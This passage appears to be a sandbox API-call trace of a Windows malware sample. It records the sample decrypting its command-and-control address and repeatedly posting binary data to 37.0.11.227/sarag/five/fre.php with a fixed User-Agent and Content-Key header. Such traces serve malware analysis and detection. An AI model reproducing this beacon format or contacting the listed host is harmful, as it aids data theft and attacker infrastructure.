RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0246.086] GetProcessHeap () returned 0x690000 [0246.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0246.087] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0246.089] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0246.089] GetProcessHeap () returned 0x690000 [0246.089] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0246.089] GetProcessHeap () returned 0x690000 [0246.089] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0246.089] send (s=0x6b0, buf=0x6ad508*, len=242, flags=0) returned 242 [0246.091] send (s=0x6b0, buf=0x6aba40*, len=159, flags=0) returned 159 [0246.091] GetProcessHeap () returned 0x690000 [0246.091] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0246.091] recv (in: s=0x6b0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0246.167] GetProcessHeap () returned 0x690000 [0246.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0246.167] GetProcessHeap () returned 0x690000 [0246.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0246.167] GetProcessHeap () returned 0x690000 [0246.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0246.168] GetProcessHeap () returned 0x690000 [0246.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0246.168] closesocket (s=0x6b0) returned 0 [0246.169] GetProcessHeap () returned 0x690000 [0246.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0246.169] GetProcessHeap () returned 0x690000 [0246.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0246.169] GetProcessHeap () returned 0x690000 [0246.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0246.169] GetProcessHeap () returned 0x690000 [0246.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0246.184] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1408) returned 0x6b0 [0246.186] Sleep (dwMilliseconds=0xea60) [0246.188] GetProcessHeap () returned 0x690000 [0246.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0246.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.189] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.208] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0246.214] GetProcessHeap () returned 0x690000 [0246.214] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0246.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.215] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0246.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.216] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.217] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.217] GetProcessHeap () returned 0x690000 [0246.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0246.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.219] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0246.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.224] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0246.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.224] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0246.224] GetProcessHeap () returned 0x690000 [0246.225] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0246.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.226] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0246.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.226] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0246.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.227] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0246.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.228] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0246.228] GetProcessHeap () returned 0x690000 [0246.228] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0246.228] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0246.229] GetProcessHeap () returned 0x690000 [0246.229] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0246.229] GetProcessHeap () returned 0x690000 [0246.229] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0246.230] GetProcessHeap () returned 0x690000 [0246.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0246.230] GetProcessHeap () returned 0x690000 [0246.230] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0246.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.231] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.236] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0246.242] GetProcessHeap () returned 0x690000 [0246.242] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0246.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.244] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0246.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.244] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.245] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.245] GetProcessHeap () returned 0x690000 [0246.246] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0246.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.247] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0246.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.248] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0246.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.249] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0246.249] GetProcessHeap () returned 0x690000 [0246.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0246.249] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.249] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0246.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.250] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0246.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.251] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0246.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.252] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0246.252] GetProcessHeap () returned 0x690000 [0246.252] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0246.252] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0246.252] GetProcessHeap () returned 0x690000 [0246.252] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0246.252] socket (af=2, type=1, protocol=6) returned 0x6b4 [0246.253] connect (s=0x6b4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0246.288] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0246.288] GetProcessHeap () returned 0x690000 [0246.288] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0246.288] GetProcessHeap () returned 0x690000 [0246.288] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0246.289] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0246.290] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0246.290] GetProcessHeap () returned 0x690000 [0246.290] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0246.290] GetProcessHeap () returned 0x690000 [0246.290] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0246.291] GetProcessHeap () returned 0x690000 [0246.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0246.291] GetProcessHeap () returned 0x690000 [0246.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0246.291] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0246.292] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0246.292] GetProcessHeap () returned 0x690000 [0246.292] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0246.292] GetProcessHeap () returned 0x690000 [0246.293] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0246.293] send (s=0x6b4, buf=0x6ad508*, len=242, flags=0) returned 242 [0246.293] send (s=0x6b4, buf=0x6aba40*, len=159, flags=0) returned 159 [0246.293] GetProcessHeap () returned 0x690000 [0246.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0246.293] recv (in: s=0x6b4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0246.391] GetProcessHeap () returned 0x690000 [0246.392] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0246.397] GetProcessHeap () returned 0x690000 [0246.397] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0246.397] GetProcessHeap () returned 0x690000 [0246.398] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0246.398] GetProcessHeap () returned 0x690000 [0246.398] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0246.398] closesocket (s=0x6b4) returned 0 [0246.399] GetProcessHeap () returned 0x690000 [0246.399] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0246.399] GetProcessHeap () returned 0x690000 [0246.399] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0246.399] GetProcessHeap () returned 0x690000 [0246.399] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0246.400] GetProcessHeap () returned 0x690000 [0246.400] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0246.401] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x140c) returned 0x6b4 [0246.402] Sleep (dwMilliseconds=0xea60) [0246.421] GetProcessHeap () returned 0x690000 [0246.421] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0246.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.423] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.429] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0246.436] GetProcessHeap () returned 0x690000 [0246.436] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0246.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.437] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0246.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.438] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.439] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.439] GetProcessHeap () returned 0x690000 [0246.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0246.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.444] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0246.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.445] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0246.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.445] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0246.445] GetProcessHeap () returned 0x690000 [0246.445] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0246.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.446] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0246.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.447] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0246.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.448] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0246.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.449] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0246.449] GetProcessHeap () returned 0x690000 [0246.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0246.449] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0246.449] GetProcessHeap () returned 0x690000 [0246.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0246.450] GetProcessHeap () returned 0x690000 [0246.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0246.450] GetProcessHeap () returned 0x690000 [0246.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0246.450] GetProcessHeap () returned 0x690000 [0246.450] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0246.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.452] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.457] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0246.464] GetProcessHeap () returned 0x690000 [0246.464] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0246.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.466] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0246.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.467] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.468] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.468] GetProcessHeap () returned 0x690000 [0246.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0246.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.470] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0246.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.471] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0246.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.472] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0246.472] GetProcessHeap () returned 0x690000 [0246.472] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0246.473] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.473] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0246.474] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.475] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0246.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.476] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0246.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.477] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0246.477] GetProcessHeap () returned 0x690000 [0246.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0246.477] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0246.477] GetProcessHeap () returned 0x690000 [0246.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0246.477] socket (af=2, type=1, protocol=6) returned 0x6b8 [0246.478] connect (s=0x6b8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0246.528] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0246.528] GetProcessHeap () returned 0x690000 [0246.528] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0246.528] GetProcessHeap () returned 0x690000 [0246.528] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0246.529] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0246.529] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0246.530] GetProcessHeap () returned 0x690000 [0246.530] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0246.530] GetProcessHeap () returned 0x690000 [0246.530] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0246.530] GetProcessHeap () returned 0x690000 [0246.530] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0246.530] GetProcessHeap () returned 0x690000 [0246.530] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0246.531] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0246.532] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0246.532] GetProcessHeap () returned 0x690000 [0246.532] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0246.532] GetProcessHeap () returned 0x690000 [0246.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0246.533] send (s=0x6b8, buf=0x6ad508*, len=242, flags=0) returned 242 [0246.533] send (s=0x6b8, buf=0x6aba40*, len=159, flags=0) returned 159 [0246.534] GetProcessHeap () returned 0x690000 [0246.534] RtlAllocateHeap (HeapHandle=0x690000, 